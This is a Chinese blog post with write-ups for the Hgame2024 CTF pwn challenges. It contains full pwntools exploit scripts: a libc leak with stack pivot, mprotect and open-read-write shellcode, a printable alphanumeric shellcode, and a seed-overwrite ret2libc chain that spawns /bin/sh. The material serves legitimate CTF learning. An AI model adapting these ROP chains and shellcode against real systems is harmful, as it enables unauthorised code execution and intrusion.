[CTF]Hgame2024-PWN部分wp

最新推荐文章于 2024-02-15 20:00:00 发布
最新推荐文章于 2024-02-15 20:00:00 发布
阅读量2k 收藏 43
点赞数 64
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79880752/article/details/136018103
版权
本文讲述了在EldenRing挑战中,作者通过分析libc库、利用栈溢出和沙盒保护策略,执行orw技巧,最终获取flag的过程,涉及到了64位动态编译环境下的逆向工程和漏洞利用技巧。
摘要由CSDN通过智能技术生成

EzSignIn

签到题,直接nc得到flag

Elden Ring Ⅰ

下载题目附件发现给了一个libc库,一张图片,还有一个文件

其实这个图片没什么用,一开始看到有图片还以为这题要结合misc

看到libc库基本就确定这题要用到libc了

将文件保存到虚拟机里checksec查看保护

开启NX,64位,动态编译,IDA分析:

看到seccomp函数,得知本题存在沙盒保护

进入vuln函数查看:

简简单单一个读入函数,可以栈溢出,但溢出字节不多

既然有沙盒,那肯定考虑使用orw的做法,这边我就不再复述思路了,不知道orw思路的朋友可以去看看我的另一篇专门写沙盒的博文:https://blog.csdn.net/2301_79880752/article/details/136016919?spm=1001.2014.3001.5502

实操:

首先我们需要泄露基址,由于本题可以栈溢出,因此我们可以直接泄露基址:

随后栈迁移修改地址到bss段

调用mprotect函数,并使用orw获取flag

这边有一点需要注意:

前面提到过,可以栈溢出,但溢出的字节不多,因此脚本编写到这里需要再一次栈迁移

不了解的朋友可以去看看另一个跟我一起学习的朋友的博文,它对基础栈迁移写的较详细:

https://blog.csdn.net/2302_79813730/article/details/136005454?spm=1001.2014.3001.5502

脚本如下:

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("47.102.130.35",31975)
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF("./libc.so.6")
#p=process("./vuln")
elf=ELF("./vuln")
#def bug():
#	gdb.attach(p)
#	pause()
rdi=0x00000000004013e3
p.recvuntil("Greetings. Traveller from beyond the fog. I Am Melina. I offer you an accord.\n")
pay=b'a'*0x108+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x40125B)
p.send(pay)
#leek libc_base================================================
puts_addr=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()
#==============================================================
bss=0x404060+0x500
p.recvuntil("Greetings. Traveller from beyond the fog. I Am Melina. I offer you an accord.\n")

pay=b'a'*0x100+p64(bss+0x100)+p64(0x401276)

p.send(pay)
rsi=libc_base+0x000000000002601f#0x000000000002be51
rdx_r12=libc_base+0x0000000000119211#0x000000000011f497
mprotect=libc_base+libc.sym['mprotect']
pay = (p64(rdi)+p64(0x404000)+p64(rsi)+p64(0x1000)+p64(rdx_r12)+p64(7)*2+p64(mprotect)+p64(0x4045a8)+asm(shellcraft.open("/flag"))+asm(shellcraft.read(3,bss+0x700,0x100))+asm(shellcraft.write(1,bss+0x700,0x100))).ljust(0x100,b'\x00')+p64(bss-8)+p64(0x0000000000401290)
#bug()
p.send(pay)

p.interactive()

ezshellcode

保护全开,64位,动态编译,IDA分析:

这个题就是一个可显字符的shellcode

先输入-1

然后发送:b"Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"

就可以绕过了

这边注意不能用sendline发送

脚本如下:

from pwn import*
context(os='linux', arch='amd64', log_level='debug')
p=process('./shellcode')
#p=remote('47.102.130.35',31408)
p.recvuntil(b'input the length of your shellcode:')
p.sendline(str(-1))
shellcode=b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
p.recvuntil(b'input your shellcode:')
p.send(shellcode)
p.interactive()

Elden Random Challenge

开启NX,64位,动态编译,IDA分析:

读入十二个字节到buf里,和v6是贴着的,而buf读入十二个字节是可以覆盖seed的,而seed是程序生产随机值的依据,覆盖掉seed以后它的随机值就可控了,写个c语言脚本控制生成的随机值

再跟进myread函数

存在栈溢出,由于本题附件给了libc库,因此直接通过libc获取权限得到flag

脚本如下:

from pwn import *
import ctypes
context(os='linux',arch='amd64',log_level='debug')
#p=process("./vuln")
p=remote('47.100.245.185',30511)
libc=ELF("./libc.so.6")
elf=ELF("./vuln")
def bug():
          gdb.attach(p)
          pause()
rdi=0x0000000000401423 
read=0x40125D 
a=[84,87,78,16,94,36,87,93,50,22,63,28,91,60,64,27,41,27,73,37,12,69,68,30,83,31,63,24,68,36,30,3,23,59,70,68,94,57,12,43,30,74,22,20,85,38,99,25,16,71,14,27,92,81,57,74,63,71,97,82,6,26,85,28,37,6,47,30,14,58,25,96,83,46,15,68,35,65,44,51,88,9,77,79,89,85,4,52,55,100,33,61,77,69,40,13,27,87,95]      
p.recvuntil("Menlina: Well tarnished, tell me thy name.")
pay=b'\x00'*(0x12)
p.send(pay)
#bug()
for i in range(len(a)):
    p.recvuntil("Please guess the number:\n")
    p.send(p32(a[i]))

    
p.recvuntil("Here's a reward to thy brilliant mind.")
payload1=b'a'*(0x30+8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(read)
p.sendline(payload1)


libc_base =u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()
payload2=b'a'*(0x30+8)+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)
p.sendline(payload2)
p.interactive()
D0.
关注
  • 64
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[CTF]HGAME2021 WP
Sapphire037的博客
02-18 1513
MISC 群青(其实是幽灵东京) wav,audicaty看频谱图 文件属性让我们试试silenteye,解密得到 访问,下载后文件名提示了SSTV,可以扫出 hgame{1_c4n_5ee_the_wav} WEB Fujiwara Tofu Shop 首先给了 猜到是要加referer头,所以加个头referer: qiumingshan.net 然后 那么我们知道 User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、
HgameCTF2021
zac的博客
02-22 480
智商检测机 题目需求是要我们完成一百道定积分的题目 这里直接用python写脚本跑一百遍 (脚本是抄的 from lxml import etree from sympy import * import requests import json s = requests.session() step: int = 0 while true: q = s.get('http://r4u.top:5000/api/getQuestion') q = json.loads(q.text)
[Hgame CTF]easyenc
weixin_73384894的博客
01-17 339
小端序
CTF-Hgame_accuracy_writeup
qq_19917367的博客
07-29 444
把相关的代码记录一下, 方便以后使用 accuracy 石碑上的文字,究竟隐藏着怎样的秘密…… Write Up 题目给出两个文件, chars.csv dataset.csv, 简单查看之后,dataset是数据集, chars是测试集 数据集是由784个pixel, 即 28 * 28 df.iloc[:,0].unique() #array([10, 11, 12, 13, 14, 15, 1, 0, 4, 7, 3, 5, 8, 9, 2, 6]) 查看标签,共有1
CTF-RE-わかります(hgame2018)
SuperGate的博客
01-27 2234
Hgame week1里面应该说是最难的一个题。 主函数点进去之后会发现一个函数来判断输入的是不是flag。点进去内容如下: 发现ptr数组存的是输入字符串转化为ascii码之后每个字符的前4位,v7则是后4位,这里的位是二进制位。 然后分别将两个dword_6021xx数组找出来,点进生成v8v9的函数就可以把flag对应的每个字符的高低位算出来了。 其中v9生成函数比较容易求出v9,v...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctfpwn题char的libc库文件
hgame-2018 CTFwp(杭电信安)week1
苟有恒,必有三更眠,五更起。
03-04 3070
原题链接 由于开放时间短,不知道什么时候结束。我会将题目的大致内容以图片形式down下来。 web1 Are you from Europe? URL http://123.206.203.108:10001/European.html 一看题,就感觉想是用burp抓包做,来自欧洲,就想到改语言,accept-langue字段。 但是,我试了en,gk等等值,并没有什么卵用。而且发现
hgame-2018 CTFwp(杭电信安)week2
苟有恒,必有三更眠,五更起。
03-04 777
草莓社区-1 描述 flag在../flag.php中 知识点:LFI URL http://118.25.18.223:10011/ 基准分数 100 当前分数 100 完成人数 118 提示很清楚,简单的本地包含: payload: http://118.25.18.223:10011/show_maopian.php?mao=../flag.ph
php talk99,CTF题目实战:2019-Hgame-Web-Week4 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com...
weixin_28929201的博客
03-23 338
前言最近利用空余时间做了一下Hgame,以下是部分web题题解。happyPython信息搜集发现是flask,随手测试一下。http://118.25.18.223:3001/{{1+1}}发现可能存在SSTI,打了几发payload,发现都是500,想到测试一下过滤。http://118.25.18.223:3001/%7B%7B'aa'.upper()%7D%7D发现将()替换成了空。SEC...
hgame2024-week1
247533的博客
02-13 836
今年的题目质量很高
HGAME 2024 WEEK1 WP
mumuzi的博客
02-06 1744
基于这一点,我想到如果我选中的图是第一张图或者最后一张图,那么用这张图片去异或其他图片,得到的信息是绝对递增的,不会出现信息个数相同的情况(即假设全为flag{123}选中的为f,再往后异或会出现f^fl = l,f^fla = la……没找到问号,试了一下welcome不对,感觉是数字但是一下子没找到,去搜leet发现字母c没有对应的数字表示,就试了下hgame{welc0me。full还是1对吧,但是如果左边我故意让右边400几次,再发正常的包,多次重复这个步骤,莫名其妙full=0了。
HGAME 2024 WEEK2 WP
最新发布
mumuzi的博客
02-15 1561
中),然后通过AES_ECB的方式对bytes进行加密,再把两组加密后的bytes恢复成图片,对恢复的两张图片进行异或操作之后,采用近邻法的方式缩小图片为(16,9)得到。在做完华容道之后的那天晚上,对着这道题先是发了一会的呆,一直把server里的check_pixels函数搞错了,我在想为什么xy又要等于黑色又不等于黑色。考虑AMM,当然我是不懂的,这里是靠搜搜到的(评论区)在第4天的下午,刷完一个两小时的沙雕动画之后,寻思来看会题,一下就解决了之前那个问题,也找到了解题的关键点。但是第一组是什么呢?
HGAME 2024 WEEK 1 :web ezHTTP
weixin_74790320的博客
02-07 648
然后提示通过那些东西访问页面,User-Agent: 是构造你浏览器访问信息的,所以复制右边那一串替代就好了。这次主要查漏补缺了知识点伪造ip地址还有:X-Real-IP:这种方式。但是本题这里构造这两个都是没有反应的,就有第三种方式。然后要求我们从本地访问,那就是伪造ip。然后我们就可以得到右边有一长串的东西。我们把它base64解码一下看看。第一想法就是Referer伪造。然后构造伪造的Referer。看到这个就知道是文件头伪造。
CTF-Reverse---VM虚拟机逆向&[HGAME 2023 week4]vm题目复现【详解】
Sciurdae的博客
11-02 999
没有前言。终于搞定第二题了。费劲是真的费。题目在nssctf上有。
【Hgame2024】#Week1 Crypto详细全解+部分Web
jayq1的博客
02-06 1750
HGame2024Week1,题解记录,对密码有一定的分析推荐阅读,其他方向写的比较基础,师傅们可以参考其他优质题解,有问题欢迎交流!
ctfd-pwn赛题收集
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题可以包含多种类型的漏洞,例如缓冲区溢出、格式化字符串漏洞、整数溢出等。在收集赛题时需要确保涵盖各种漏洞类型,增加题目的多样性和挑战性。 2. 难度级别:赛题的难度级别应该根据参赛者的水平来确定。可以设置多个难度级别的赛题,包括初级、中级和高级,以便参赛者可以逐步提高自己的技能。 3. 原创性:收集ctfd-pwn赛题时应尽量保持赛题的原创性,避免过多的抄袭或重复的赛题。这有助于增加参赛者的学习价值,同时也能提高比赛的公平性。 4. 实用性:收集的赛题应该具有实际应用的意义,能够模拟真实的漏洞和攻击场景。这样可以帮助参赛者更好地理解和掌握系统安全的基本原理。 5. 文档和解答:为每个收集的赛题准备详细的文档和解答是很有必要的。这些文档包括赛题的描述、利用漏洞的步骤和参考资源等,可以帮助参赛者更好地理解赛题和解题思路。 6. 持续更新:CTF比赛的赛题应该定期进行更新和维护,以适应不断变化的网络安全环境。同时也要根据参赛者的反馈和需求,不断收集新的赛题,提供更好的比赛体验。 综上所述,ctfd-pwn赛题的收集需要考虑赛题类型、难度级别、原创性、实用性、文档和解答的准备,以及持续更新的需求。这样才能提供一个富有挑战性和教育性的CTF比赛平台。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值